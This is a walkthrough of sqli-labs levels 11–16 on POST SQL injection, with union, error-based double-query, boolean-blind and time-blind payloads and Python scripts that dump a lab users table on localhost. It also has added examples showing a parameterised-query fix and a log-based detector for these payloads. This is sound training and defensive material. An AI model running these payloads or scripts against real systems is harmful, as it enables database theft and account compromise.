LESS 11 String-based injection (POST)
Enter a single quote ' in the username field as a test. The result:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' and password='' LIMIT 0,1' at line 1
The query is presumably: select * from users where username = '$username' and password='$password' LIMIT 0,1
So build the payload:
Username : 0' union select group_concat(username),group_concat(password) from users#
Password :
Result:
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
LESS 12 Double-quote string-based injection (POST)
The difference from the previous level is that the string is enclosed in double quotes and parentheses, which the error message reveals.
The payload:
Username : 0") union select group_concat(username),group_concat(password) from users#
Password :
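As an added example (not code from this walkthrough or from the sqli-labs project): the login query that levels 11 and 12 build by string concatenation, next to the parameterised form that closes the hole. The user rows are constructed from the credentials dumped above, and sqlite3 stands in for MariaDB so the example runs offline. MariaDB honours the trailing `#` as a comment and executes the injected UNION; SQLite rejects the mangled statement instead. In both cases the input has reached the SQL parser, which the placeholder version never allows.

```python
import sqlite3

# The level 11 payload from the walkthrough, used here as a test input
UNION_PAYLOAD = "0' union select group_concat(username),group_concat(password) from users#"


def make_db():
    """In-memory users table; rows constructed from the credentials dumped above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("Dumb", "Dumb"), ("Angelina", "I-kill-you"), ("Dummy", "p@ssword")],
    )
    return conn


def unsafe_query(username, password):
    """The lab's pattern: user input is spliced into the SQL text itself."""
    return ("SELECT username, password FROM users "
            "WHERE username='%s' AND password='%s' LIMIT 0,1" % (username, password))


def unsafe_login(conn, username, password):
    """Run the concatenated query; returns the row, None, or ('error', message)."""
    try:
        return conn.execute(unsafe_query(username, password)).fetchone()
    except sqlite3.Error as exc:
        # The quote and '#' inside the input broke the statement: the input was
        # parsed as SQL. MariaDB would accept the '#' comment and run the UNION.
        return ("error", str(exc))


def safe_login(conn, username, password):
    """Parameterised form: the SQL text is constant, inputs travel as bound values."""
    return conn.execute(
        "SELECT username, password FROM users WHERE username=? AND password=? LIMIT 1",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(safe_login(db, "Dumb", "Dumb"))        # ('Dumb', 'Dumb')
    print(safe_login(db, UNION_PAYLOAD, ""))     # None: the payload is just an unknown username
    print(unsafe_login(db, UNION_PAYLOAD, ""))   # ('error', ...): the payload reached the parser
```

With placeholders the payload is compared, byte for byte, against the username column and simply matches nothing; the same fix applies to the double-quoted, parenthesised variant of level 12, since the quoting style of the template no longer matters once input is bound instead of spliced.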
LESS 13 Double-query injection (POST)
The error message shows that the string is enclosed in a pair of single quotes and a pair of parentheses, but a successful login displays no data; only error messages are shown, so use double-query injection:
Username : 0') union select count(*), CONCAT_WS(CHAR(32,58,32),(select count(*) from users),floor(rand()*2)) as a from users group by a#
Password :
Result:
Duplicate entry '13 : 1' for key 'group_key'
A script can be written to dump the table:

```python
from urllib import request
from urllib import parse
import re

url = "http://localhost/sqli-labs-master/Less-13/"
i = 0
# 13 rows, as leaked by the count(*) query above
while i < 13:
    # Each request leaks one username/password pair through the duplicate-key error text
    data = {"uname": "0') union select count(*), CONCAT_WS(CHAR(32,124,32),(select username from users limit "+str(i)+",1),(select password from users limit "+str(i)+",1),floor(rand()*2)) as a from users group by a#", "passwd": ""}
    response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
    info = re.search(r"[^']+\s\|\s[^\s]+?", response)
    if info is None:
        # rand() produced no duplicate this time; retry the same row
        i -= 1
    else:
        print(info.group())
    i += 1
```
Result:
Dumb | Dumb | 0
Angelina | I-kill-you | 1
Dummy | p@ssword | 0
secure | crappy | 1
stupid | stupidity | 1
superman | genious | 0
batman | mob!le | 1
admin | admin | 0
admin1 | admin1 | 0
admin2 | admin2 | 1
admin3 | admin3 | 1
dhakkan | dumbo | 1
admin4 | admin4 | 0
LESS 14 Double-quote double-query injection (POST)
Apart from replacing the single quote and parenthesis with a double quote, there is no difference from the previous level. Payload:
Username : 0" union select count(*), CONCAT_WS(CHAR(32,58,32),(select count(*) from users),floor(rand()*2)) as a from users group by a#
Password :
Everything else is the same as level 13.
LESS 15 Boolean-based blind injection (POST)
POST blind injection; the script from level 7 can be adapted:

```python
from urllib import request
from urllib import parse
import re

url = "http://localhost/sqli-labs-master/Less-15/"

def getLength(value):
    # Count upwards until the page stops showing the failed-login image ("slap")
    length = 0
    while True:
        data = {"uname": "' or length("+str(value)+")="+str(length)+"#", "passwd": ""}
        response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
        if re.search("slap", response):
            length += 1
        else:
            return length

def getName(value):
    dbname = ""
    for n in range(getLength(value)):
        a = 64
        b = 64
        # Binary search for the ASCII code of the n-th character
        while True:
            b = int(b/2)
            data = {"uname": "' or ascii(substr(" + value + "," + str(n+1) + "))<" + str(a) + "#", "passwd": ""}
            response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
            if re.search("slap", response):
                # Not below a: test for equality, otherwise move the guess upwards
                data["uname"] = "' or ascii(substr(" + value + "," + str(n+1) + "))=" + str(a) + "#"
                response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
                if re.search("slap", response):
                    a += b
                else:
                    dbname = dbname + chr(a)
                    break
            else:
                a -= b
    return dbname

print(getName("(select group_concat(username) from users)"))
print(getName("(select group_concat(password) from users)"))
```
The result is the same as level 8.
LESS 16 Time-based blind injection (POST)
Combining the script from level 9 with a modified version of the previous level's script gives the script for this level:

```python
from urllib import request
from urllib import parse
import time

url = "http://localhost/sqli-labs-master/Less-15/"

def getLength(value):
    # A response within 0.1 s means sleep() did not fire, i.e. the guess was wrong
    length = 0
    while True:
        data = {"uname": "' or if(length("+value+")="+str(length)+",sleep(0.1),1)#", "passwd": ""}
        t = time.time()
        request.urlopen(url, parse.urlencode(data).encode()).read().decode()
        if time.time()-t <= 0.1:
            length += 1
        else:
            return length

def getName(value):
    dbname = ""
    for n in range(getLength(value)):
        a = 64
        b = 64
        # Binary search for the ASCII code of the n-th character, timing each probe
        while True:
            b = int(b/2)
            data = {"uname": "' or if(ascii(substr("+value+","+str(n+1)+"))<"+str(a)+",sleep(0.1),1)#", "passwd": ""}
            t = time.time()
            request.urlopen(url, parse.urlencode(data).encode()).read().decode()
            if time.time()-t <= 0.1:
                # Not below a: test for equality, otherwise move the guess upwards
                data["uname"] = "' or if(ascii(substr("+value+","+str(n+1)+"))="+str(a)+",sleep(0.1),1)#"
                t = time.time()
                request.urlopen(url, parse.urlencode(data).encode()).read().decode()
                if time.time()-t <= 0.1:
                    a += b
                else:
                    dbname = dbname + chr(a)
                    break
            else:
                a -= b
    return dbname

print(getName("(select group_concat(username) from users)"))
print(getName("(select group_concat(password) from users)"))
```
Too slow; I don't know of a good way to improve it.
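As an added example from the detection side (not code from this walkthrough or from sqli-labs): the scripts for levels 11 to 16 leave very recognisable traffic, a single UNION/group_concat or floor(rand()*2)/group by request for the error-based levels, and dozens of ascii(substr(...)) or sleep() probes per leaked string for the blind levels. The classifier below runs over constructed log lines; the log format (timestamp, client address, raw uname field) is an assumption, since an ordinary access log does not record POST bodies and an application or WAF audit log would be needed.

```python
import re
from collections import Counter, defaultdict

# Signatures for the payload families exercised in levels 11 to 16. Order matters:
# a time-based probe also contains ascii(substr(...)) or length(...), so the
# sleep()/benchmark() pattern is tested before the boolean one.
SIGNATURES = [
    ("union-exfil",   re.compile(r"union\s+select.*group_concat\s*\(", re.I)),
    ("double-query",  re.compile(r"floor\s*\(\s*rand\s*\(\s*\)\s*\*\s*2\s*\).*group\s+by", re.I)),
    ("time-blind",    re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("boolean-blind", re.compile(r"\b(?:ascii|length)\s*\(", re.I)),
]

# Assumed log format, constructed for this example: "<timestamp> <client> uname=<raw field>"
LOG_LINE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) uname=(?P<uname>.*)$")


def classify(uname):
    """Name of the first matching signature, or None for ordinary input."""
    for name, pattern in SIGNATURES:
        if pattern.search(uname):
            return name
    return None


def analyze(lines, probe_threshold=20):
    """Count signature hits per client and derive one alert per client.

    A single union or double-query hit is already a data-extraction attempt. Blind
    probes are alerted once a client has sent probe_threshold of them, because each
    leaked character costs several requests (see the level 15 script above)."""
    hits = defaultdict(Counter)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these separately
        label = classify(m.group("uname"))
        if label:
            hits[m.group("src")][label] += 1
    alerts = {}
    for src, counts in hits.items():
        if counts["union-exfil"] or counts["double-query"]:
            alerts[src] = "sql-injection: data extraction"
        elif counts["boolean-blind"] + counts["time-blind"] >= probe_threshold:
            alerts[src] = "sql-injection: blind probing"
    return hits, alerts


def sample_log():
    """Constructed log lines reproducing the traffic shapes of the scripts on this page."""
    lines = [
        "2024-01-01T10:00:00 192.168.1.10 uname=Dumb",
        "2024-01-01T10:00:05 192.168.1.10 uname=admin",
        "2024-01-01T10:01:00 10.0.0.5 uname=0' union select group_concat(username),group_concat(password) from users#",
        "2024-01-01T10:02:00 10.0.0.6 uname=0') union select count(*), CONCAT_WS(CHAR(32,58,32),(select count(*) from users),floor(rand()*2)) as a from users group by a#",
    ]
    # 25 boolean-blind probes from one client, shaped like the level 15 script
    for n in range(25):
        lines.append("2024-01-01T10:03:%02d 10.0.0.9 uname=' or ascii(substr((select group_concat(username) from users),%d))<64#" % (n, n + 1))
    # 3 time-based probes from another client: counted, but below the alert threshold
    for n in range(3):
        lines.append("2024-01-01T10:04:%02d 10.0.0.7 uname=' or if(length((select group_concat(username) from users))=%d,sleep(0.1),1)#" % (n, n))
    return lines


if __name__ == "__main__":
    hits, alerts = analyze(sample_log())
    for src, counts in hits.items():
        print(src, dict(counts))
    print(alerts)
```

The threshold is the interesting knob: the level 15 script needs a length probe per character plus about seven comparisons per character, so even a short string produces far more than twenty requests from one client, while a user who mistypes a password a few times never reaches it.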